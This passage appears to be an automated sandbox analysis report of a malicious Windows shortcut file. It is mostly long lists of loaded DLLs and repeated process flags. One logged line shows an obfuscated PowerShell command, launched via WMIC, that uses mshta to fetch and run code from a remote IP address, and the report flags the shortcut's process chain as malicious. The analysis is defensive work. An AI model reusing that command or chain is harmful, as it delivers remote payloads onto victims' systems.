Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: 6G4au3vWsI.lnkLNK file: ..\..\..\Windows\System32\Wbem\wmic.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000006.00000002.1464128230.00000221F4FC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1465320420.00000221F52DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1464128230.00000221F50AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdb8* source: powershell.exe, 00000006.00000002.1464128230.00000221F50AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDBJn source: powershell.exe, 00000006.00000002.1465320420.00000221F52DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000006.00000002.1464128230.00000221F50AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1465320420.00000221F52DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000006.00000002.1464128230.00000221F50AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\Z:\syscalls\amsi64_7668.amsi.csve.pdb source: powershell.exe, 00000006.00000002.1464128230.00000221F5012000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.1464128230.00000221F507B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1465320420.00000221F5323000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb2 source: powershell.exe, 00000006.00000002.1464128230.00000221F5012000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdbyh source: powershell.exe, 00000006.00000002.1465320420.00000221F52DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1464128230.00000221F50AC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1464128230.00000221F507B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1464128230.00000221F4FC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000006.00000002.1465320420.00000221F52DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbH source: powershell.exe, 00000006.00000002.1465320420.00000221F52DA000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF887A160AB push cs; ret 6_2_00007FF887A160B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF887A1CBAB push esi; ret 6_2_00007FF887A1CBCA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF887A1CB6D push ebp; ret 6_2_00007FF887A1CBAA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF887A1FB5D push esp; retf 6_2_00007FF887A1FB5E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF887A23200 push ebp; retf 6_2_00007FF887A34F7A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF887A18167 push ebx; ret 6_2_00007FF887A1816A

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Creates processes via WMI
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
